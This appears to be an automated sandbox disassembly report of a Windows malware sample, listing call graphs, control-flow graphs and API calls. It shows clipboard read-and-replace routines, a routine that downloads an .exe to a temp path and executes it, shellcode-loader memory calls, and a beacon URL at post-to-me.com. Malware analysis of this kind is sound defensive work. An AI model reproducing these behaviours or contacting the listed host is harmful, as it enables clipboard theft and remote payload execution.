65071 434d77 65070->65071 65072 434d62 HeapAlloc 65070->65072 65076 434d4b std::_Locinfo::_Locinfo_ctor 65070->65076 65079 42eac9 20 API calls _Atexit 65071->65079 65073 434d75 65072->65073 65072->65076 65075 42e0db 65073->65075 65075->65052 65076->65071 65076->65072 65078 42f450 7 API calls 2 library calls 65076->65078 65078->65076 65079->65075 65081 42dfcc _Atexit 65080->65081 65082 42dfd3 GetLastError ExitThread 65081->65082 65083 42dfe0 65081->65083 65096 431eda GetLastError 65083->65096 65085 42dfe5 65116 435571 65085->65116 65088 42dffb 65123 401169 65088->65123 65097 431ef0 65096->65097 65098 431ef6 65096->65098 65131 435111 11 API calls 2 library calls 65097->65131 65100 434d2a _Atexit 20 API calls 65098->65100 65103 431f45 SetLastError 65098->65103 65101 431f08 65100->65101 65102 431f10 65101->65102 65132 435167 11 API calls 2 library calls 65101->65132 65105 43346a _free 20 API calls 65102->65105 65103->65085 65107 431f16 65105->65107 65106 431f25 65106->65102 65108 431f2c 65106->65108 65109 431f51 SetLastError 65107->65109 65133 431d4c 20 API calls _Atexit 65108->65133 65134 42df7d 167 API calls 2 library calls 65109->65134 65112 431f37 65114 43346a _free 20 API calls 65112->65114 65113 431f5d 65115 431f3e 65114->65115 65115->65103 65115->65109 65117 435596 65116->65117 65118 43558c 65116->65118 65135 434e93 5 API calls 2 library calls 65117->65135 65120 40f8cf __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 65118->65120 65122 42dff0 65120->65122 65121 4355ad 65121->65118 65122->65088 65130 4354a4 10 API calls 2 library calls 65122->65130 65136 405800 65123->65136 65149 40155a Sleep 65123->65149 65124 401173 65127 42e199 65124->65127 65328 42e074 65127->65328 65129 42e1a6 65130->65088 65131->65098 65132->65106 65133->65112 65134->65113 65135->65121 65137 40580c Concurrency::details::_TaskCollection::_Alias 65136->65137 65138 4010ea std::_Cnd_initX 35 API calls 65137->65138 65139 405821 __Cnd_signal 65138->65139 65140 405839 65139->65140 65195 40ce32 28 API calls std::_Throw_Cpp_error 65139->65195 65142 401109 std::_Cnd_initX 28 API calls 65140->65142 65143 405842 65142->65143 65151 4029f4 InternetOpenW 65143->65151 65167 4016df 65143->65167 65146 405849 Concurrency::details::_TaskCollection::_Alias _MallocaArrayHolder 65146->65124 65150 4016d5 65149->65150 65152 402a27 InternetOpenUrlW 65151->65152 65153 402b9c 65151->65153 65152->65153 65154 402a3d GetTempPathW GetTempFileNameW 65152->65154 65156 40f8cf __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 65153->65156 65196 42a88e 65154->65196 65158 402bab 65156->65158 65188 40e76b 65158->65188 65159 402b8b InternetCloseHandle InternetCloseHandle 65159->65153 65160 402aa8 Hash 65161 402ac0 InternetReadFile WriteFile 65160->65161 65162 402b00 CloseHandle 65160->65162 65161->65160 65198 402960 65162->65198 65165 402b2b ShellExecuteExW 65165->65159 65166 402b72 WaitForSingleObject CloseHandle 65165->65166 65166->65159 65306 40fde6 65167->65306 65169 4016eb Sleep 65307 40cc10 65169->65307 65172 40cc10 28 API calls 65173 401711 65172->65173 65174 40171b OpenClipboard 65173->65174 65175 401943 Sleep 65174->65175 65176 40172b GetClipboardData 65174->65176 65175->65174 65177 40173b GlobalLock 65176->65177 65178 40193d CloseClipboard 65176->65178 65177->65178 65182 401748 _strlen 65177->65182 65178->65175 65179 40cbc7 28 API calls std::system_error::system_error 65179->65182 65180 40cc10 28 API calls 65180->65182 65182->65178 65182->65179 65182->65180 65183 4018d2 EmptyClipboard GlobalAlloc 65182->65183 65311 402e66 167 API calls 2 library calls 65182->65311 65313 40caa6 26 API calls _Deallocate 65182->65313 65183->65182 65184 4018eb GlobalLock 65183->65184 65312 426990 65184->65312 65187 401905 GlobalUnlock SetClipboardData GlobalFree 65187->65182 65319 40deea 65188->65319 65193 40e810 65193->65146 65194 40e782 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 65326 40def6 LeaveCriticalSection std::_Lockit::~_Lockit 65194->65326 65195->65140 65197 402a76 CreateFileW 65196->65197 65197->65159 65197->65160 65199 40298b Hash _wcslen 65198->65199 65208 42b454 65199->65208 65203 4029b8 65230 404333 65203->65230 65206 40f8cf __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 65207 4029f2 65206->65207 65207->65159 65207->65165 65234 42b106 65208->65234 65211 402823 65212 402832 Concurrency::details::_TaskCollection::_Alias 65211->65212 65260 4032dd 65212->65260 65214 402846 65276 403b8b 65214->65276 65216 40285a 65217 402888 65216->65217 65218 40286c 65216->65218 65282 403112 65217->65282 65303 40329a 167 API calls 65218->65303 65221 402895 65285 403c20 65221->65285 65223 4028a7 65295 403cc2 65223->65295 65225 4028c4 65227 404333 26 API calls 65225->65227 65226 40287f std::ios_base::_Ios_base_dtor Concurrency::details::_TaskCollection::_Alias 65226->65203 65228 4028e3 65227->65228 65304 40329a 167 API calls 65228->65304 65231 4029e4 65230->65231 65232 40433b 65230->65232 65231->65206 65305 40cc96 26 API calls 2 library calls 65232->65305 65235 42b133 65234->65235 65236 42b137 65235->65236 65237 42b142 65235->65237 65238 42b15a 65235->65238 65242 40f8cf __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 65236->65242 65240 42eac9 _free 20 API calls 65237->65240 65239 42a747 __fassign 162 API calls 65238->65239 65241 42b165 65239->65241 65243 42b147 65240->65243 65244 42b170 65241->65244 65245 42b307 65241->65245 65246 4029a4 65242->65246 65247 42a59d __Thrd_start 26 API calls 65243->65247 65250 42b218 WideCharToMultiByte 65244->65250 65255 42b17b 65244->65255 65257 42b1b5 WideCharToMultiByte 65244->65257 65248 42b334 WideCharToMultiByte 65245->65248 65249 42b312 65245->65249 65246->65211 65247->65236 65248->65249 65249->65236 65251 42eac9 _free 20 API calls 65249->65251 65252 42b243 65250->65252 65250->65255 65251->65236 65254 42b24c GetLastError 65252->65254 65252->65255 65254->65255 65259 42b25b 65254->65259 65255->65236 65256 42eac9 _free 20 API calls 65255->65256 65256->65236 65257->65255 65258 42b274 WideCharToMultiByte 65258->65249 65258->65259 65259->65236 65259->65249 65259->65258 65261 4032e9 Concurrency::details::_TaskCollection::_Alias 65260->65261 65262 40467c 167 API calls 65261->65262 65263 403315 65262->65263 65264 40484d 167 API calls 65263->65264 65265 40333e 65264->65265 65266 40458c 26 API calls 65265->65266 65267 40334d 65266->65267 65268 403392 std::ios_base::_Ios_base_dtor 65267->65268 65269 40dde3 167 API calls 65267->65269 65271 4033ce Concurrency::details::_TaskCollection::_Alias 65268->65271 65272 40c618 167 API calls 65268->65272 65270 403362 65269->65270 65270->65268 65273 40458c 26 API calls 65270->65273 65271->65214 65272->65271 65274 403373 65273->65274 65275 404c14 167 API calls 65274->65275 65275->65268 65277 403b97 Concurrency::details::_TaskCollection::_Alias 65276->65277 65278 4042af 167 API calls 65277->65278 65279 403ba3 65278->65279 65280 403bc7 Concurrency::details::_TaskCollection::_Alias 65279->65280 65281 4034fb 167 API calls 65279->65281 65280->65216 65281->65280 65283 404356 28 API calls 65282->65283 65284 40312c Hash 65283->65284 65284->65221 65286 403c2c Concurrency::details::_TaskCollection::_Alias 65285->65286 65287 40c618 167 API calls 65286->65287 65288 403c4f 65287->65288 65289 4042af 167 API calls 65288->65289 65290 403c59 65289->65290 65291 403c9c Concurrency::details::_TaskCollection::_Alias 65290->65291 65294 4034fb 167 API calls 65290->65294 65291->65223 65292 403c7a 65292->65291 65293 4046ca 167 API calls 65292->65293 65293->65291 65294->65292 65296 403cce __EH_prolog3_catch 65295->65296 65297 4042af 167 API calls 65296->65297 65299 403ce7 65297->65299 65298 4046ca 167 API calls 65301 403d70 Concurrency::details::_TaskCollection::_Alias 65298->65301 65300 403d17 65299->65300 65302 40369f 40 API calls 65299->65302 65300->65298 65301->65225 65302->65300 65303->65226 65304->65226 65305->65231 65306->65169 65308 40cc2c _strlen 65307->65308 65314 40cbc7 65308->65314 65310 401704 65310->65172 65311->65182 65312->65187 65313->65182 65315 40cbfa 65314->65315 65316 40cbd6 BuildCatchObjectHelperInternal 65314->65316 65315->65316 65318 40cb5c 28 API calls 4 library calls 65315->65318 65316->65310 65318->65316 65327 40f22a EnterCriticalSection 65319->65327 65321 40def4 65322 40ce99 GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 65321->65322 65323 40ced2 65322->65323 65324 40cec7 CloseHandle 65322->65324 65325 40ced6 GetCurrentThreadId 65323->65325 65324->65325 65325->65194 65326->65193 65327->65321 65337 431f5e GetLastError 65328->65337 65330 42e083 ExitThread 65331 42e0a1 65334 42e0b4 65331->65334 65335 42e0ad CloseHandle 65331->65335 65334->65330 65336 42e0c0 FreeLibraryAndExitThread 65334->65336 65335->65334 65338 431f7d 65337->65338 65339 431f77 65337->65339 65340 434d2a _Atexit 17 API calls 65338->65340 65343 431fd4 SetLastError 65338->65343 65357 435111 11 API calls 2 library calls 65339->65357 65342 431f8f 65340->65342 65350 431f97 65342->65350 65358 435167 11 API calls 2 library calls 65342->65358 65344 42e07f 65343->65344 65344->65330 65344->65331 65356 4354f6 10 API calls 2 library calls 65344->65356 65346 43346a _free 17 API calls 65348 431f9d 65346->65348 65347 431fac 65349 431fb3 65347->65349 65347->65350 65351 431fcb SetLastError 65348->65351 65359 431d4c 20 API calls _Atexit 65349->65359 65350->65346 65351->65344 65353 431fbe 65354 43346a _free 17 API calls 65353->65354 65355 431fc4 65354->65355 65355->65343 65355->65351 65356->65331 65357->65338 65358->65347 65359->65353 65360->65009 65361 40239e 65362 402561 PostQuitMessage 65361->65362 65363 4023b2 65361->65363 65367 40255f 65362->65367 65364 4023b9 DefWindowProcW 65363->65364 65365 4023d0 65363->65365 65364->65367 65366 4029f4 167 API calls 65365->65366 65365->65367 65366->65367

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 004016E6
                                                                                                    • Sleep.KERNEL32(00001541,0000004C), ref: 004016F0
                                                                                                      • Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27
                                                                                                    • OpenClipboard.USER32(00000000), ref: 0040171D
                                                                                                    • GetClipboardData.USER32(00000001), ref: 0040172D
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0040173C
                                                                                                    • _strlen.LIBCMT ref: 00401749
                                                                                                    • _strlen.LIBCMT ref: 00401778
                                                                                                    • _strlen.LIBCMT ref: 004018BC
                                                                                                    • EmptyClipboard.USER32 ref: 004018D2
                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004018FD
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00401909
                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 00401912
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00401919
                                                                                                    • CloseClipboard.USER32 ref: 0040193D
                                                                                                    • Sleep.KERNEL32(000002D2), ref: 00401948
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                    • String ID: i
                                                                                                    • API String ID: 1583243082-3865851505
                                                                                                    • Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                                                                    • Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
                                                                                                    • Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                                                                    • Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
                                                                                                    • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
                                                                                                    • GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
                                                                                                    • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00402B07
                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 00402B68
                                                                                                    • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00402B89
                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00402B92
                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00402B95
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                    • String ID: .exe$<$ShareScreen
                                                                                                    • API String ID: 3323492106-493228180
                                                                                                    • Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                                                                    • Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
                                                                                                    • Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                                                                    • Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4
                                                                                                    APIs
                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006007CE
                                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 006007EE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569778024.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_600000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                    • String ID:
                                                                                                    • API String ID: 3833638111-0
                                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                    • Instruction ID: a0c3c5a155091ec75559ee221d451be8e32f42a1203f8d40e6fd4468fd81454b
                                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                    • Instruction Fuzzy Hash: 75F0CD32240714ABE7243AB9A88CBAF76E9AF49725F100528E642911C0DAB8F8058A61

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 74 43d03c-43d06c call 43cd9f 77 43d087-43d093 call 43977e 74->77 78 43d06e-43d079 call 42eab6 74->78 84 43d095-43d0aa call 42eab6 call 42eac9 77->84 85 43d0ac-43d0f5 call 43cd0a 77->85 83 43d07b-43d082 call 42eac9 78->83 94 43d35e-43d364 83->94 84->83 92 43d162-43d16b GetFileType 85->92 93 43d0f7-43d100 85->93 98 43d1b4-43d1b7 92->98 99 43d16d-43d19e GetLastError call 42ea93 CloseHandle 92->99 96 43d102-43d106 93->96 97 43d137-43d15d GetLastError call 42ea93 93->97 96->97 103 43d108-43d135 call 43cd0a 96->103 97->83 101 43d1c0-43d1c6 98->101 102 43d1b9-43d1be 98->102 99->83 113 43d1a4-43d1af call 42eac9 99->113 106 43d1ca-43d218 call 4396c7 101->106 107 43d1c8 101->107 102->106 103->92 103->97 117 43d21a-43d226 call 43cf1b 106->117 118 43d228-43d24c call 43cabd 106->118 107->106 113->83 117->118 123 43d250-43d25a call 4335cd 117->123 124 43d25f-43d2a2 118->124 125 43d24e 118->125 123->94 127 43d2c3-43d2d1 124->127 128 43d2a4-43d2a8 124->128 125->123 131 43d2d7-43d2db 127->131 132 43d35c 127->132 128->127 130 43d2aa-43d2be 128->130 130->127 131->132 133 43d2dd-43d310 CloseHandle call 43cd0a 131->133 132->94 136 43d312-43d33e GetLastError call 42ea93 call 439890 133->136 137 43d344-43d358 133->137 136->137 137->132
                                                                                                    APIs
                                                                                                      • Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                                                                    • GetLastError.KERNEL32 ref: 0043D150
                                                                                                    • __dosmaperr.LIBCMT ref: 0043D157
                                                                                                    • GetFileType.KERNEL32(00000000), ref: 0043D163
                                                                                                    • GetLastError.KERNEL32 ref: 0043D16D
                                                                                                    • __dosmaperr.LIBCMT ref: 0043D176
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0043D196
                                                                                                    • CloseHandle.KERNEL32(?), ref: 0043D2E0
                                                                                                    • GetLastError.KERNEL32 ref: 0043D312
                                                                                                    • __dosmaperr.LIBCMT ref: 0043D319
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                    • String ID: H
                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                    • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                    • Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
                                                                                                    • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                    • Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 142 432f29-432f39 143 432f53-432f55 142->143 144 432f3b-432f4e call 42eab6 call 42eac9 142->144 146 432f5b-432f61 143->146 147 4332bd-4332ca call 42eab6 call 42eac9 143->147 160 4332d5 144->160 146->147 150 432f67-432f92 146->150 165 4332d0 call 42a59d 147->165 150->147 153 432f98-432fa1 150->153 156 432fa3-432fb6 call 42eab6 call 42eac9 153->156 157 432fbb-432fbd 153->157 156->165 158 432fc3-432fc7 157->158 159 4332b9-4332bb 157->159 158->159 163 432fcd-432fd1 158->163 164 4332d8-4332dd 159->164 160->164 163->156 168 432fd3-432fea 163->168 165->160 171 433007-433010 168->171 172 432fec-432fef 168->172 175 433012-433029 call 42eab6 call 42eac9 call 42a59d 171->175 176 43302e-433038 171->176 173 432ff1-432ff7 172->173 174 432ff9-433002 172->174 173->174 173->175 179 4330a3-4330bd 174->179 204 4331f0 175->204 177 43303a-43303c 176->177 178 43303f-43305d call 4336a7 call 43346a * 2 176->178 177->178 212 43307a-4330a0 call 4347ee 178->212 213 43305f-433075 call 42eac9 call 42eab6 178->213 181 4330c3-4330d3 179->181 182 433191-43319a call 43d365 179->182 181->182 185 4330d9-4330db 181->185 195 43320d 182->195 196 43319c-4331ae 182->196 185->182 189 4330e1-433107 185->189 189->182 193 43310d-433120 189->193 193->182 200 433122-433124 193->200 202 433211-433229 ReadFile 195->202 196->195 198 4331b0-4331bf GetConsoleMode 196->198 198->195 203 4331c1-4331c5 198->203 200->182 205 433126-433151 200->205 207 433285-433290 GetLastError 202->207 208 43322b-433231 202->208 203->202 209 4331c7-4331e1 ReadConsoleW 203->209 210 4331f3-4331fd call 43346a 204->210 205->182 211 433153-433166 205->211 214 433292-4332a4 call 42eac9 call 42eab6 207->214 215 4332a9-4332ac 207->215 208->207 216 433233 208->216 219 4331e3 GetLastError 209->219 220 433202-43320b 209->220 210->164 211->182 224 433168-43316a 211->224 212->179 213->204 214->204 221 4332b2-4332b4 215->221 222 4331e9-4331ef call 42ea93 215->222 218 433236-433248 216->218 218->210 229 43324a-43324e 218->229 219->222 220->218 221->210 222->204 224->182 232 43316c-43318c 224->232 235 433250-433260 call 432c45 229->235 236 433267-433272 229->236 232->182 247 433263-433265 235->247 241 433274 call 432d95 236->241 242 43327e-433283 call 432a85 236->242 248 433279-43327c 241->248 242->248 247->210 248->247
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                    • Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
                                                                                                    • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                    • Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 250 64003c-640047 251 64004c-640263 call 640a3f call 640e0f call 640d90 VirtualAlloc 250->251 252 640049 250->252 267 640265-640289 call 640a69 251->267 268 64028b-640292 251->268 252->251 273 6402ce-6403c2 VirtualProtect call 640cce call 640ce7 267->273 270 6402a1-6402b0 268->270 272 6402b2-6402cc 270->272 270->273 272->270 279 6403d1-6403e0 273->279 280 6403e2-640437 call 640ce7 279->280 281 640439-6404b8 VirtualFree 279->281 280->279 283 6405f4-6405fe 281->283 284 6404be-6404cd 281->284 287 640604-64060d 283->287 288 64077f-640789 283->288 286 6404d3-6404dd 284->286 286->283 292 6404e3-640505 LoadLibraryA 286->292 287->288 293 640613-640637 287->293 290 6407a6-6407b0 288->290 291 64078b-6407a3 288->291 294 6407b6-6407cb 290->294 295 64086e-6408be LoadLibraryA 290->295 291->290 296 640517-640520 292->296 297 640507-640515 292->297 298 64063e-640648 293->298 300 6407d2-6407d5 294->300 304 6408c7-6408f9 295->304 301 640526-640547 296->301 297->301 298->288 299 64064e-64065a 298->299 299->288 303 640660-64066a 299->303 305 640824-640833 300->305 306 6407d7-6407e0 300->306 302 64054d-640550 301->302 309 640556-64056b 302->309 310 6405e0-6405ef 302->310 311 64067a-640689 303->311 313 640902-64091d 304->313 314 6408fb-640901 304->314 312 640839-64083c 305->312 307 6407e4-640822 306->307 308 6407e2 306->308 307->300 308->305 315 64056d 309->315 316 64056f-64057a 309->316 310->286 317 640750-64077a 311->317 318 64068f-6406b2 311->318 312->295 319 64083e-640847 312->319 314->313 315->310 320 64057c-640599 316->320 321 64059b-6405bb 316->321 317->298 322 6406b4-6406ed 318->322 323 6406ef-6406fc 318->323 324 640849 319->324 325 64084b-64086c 319->325 333 6405bd-6405db 320->333 321->333 322->323 327 6406fe-640748 323->327 328 64074b 323->328 324->295 325->312 327->328 328->311 333->302
                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0064024D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID: cess$kernel32.dll
                                                                                                    • API String ID: 4275171209-1230238691
                                                                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                    • Instruction ID: a423119f28f71322aa1b2375cdb90a01b50a8322b1bace4d1f3b775e6e7404e9
                                                                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                    • Instruction Fuzzy Hash: 39526874A01229DFDB64CF68C985BA8BBB1BF09304F1480D9E94DAB351DB30AE85DF14

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27
                                                                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00402E4B
                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00402E4E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Internet$CloseHandleOpen_wcslen
                                                                                                    • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                                                                    • API String ID: 3067768807-1501832161
                                                                                                    • Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                                                                    • Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
                                                                                                    • Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                                                                    • Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                    • String ID:
                                                                                                    • API String ID: 1687354797-0
                                                                                                    • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                    • Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
                                                                                                    • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                    • Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 0040581C
                                                                                                    • __Cnd_signal.LIBCPMT ref: 00405828
                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 0040583D
                                                                                                    • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                    • String ID:
                                                                                                    • API String ID: 2059591211-0
                                                                                                    • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                    • Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
                                                                                                    • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                    • Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                    • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                    Strings
                                                                                                    Memory Dump Source
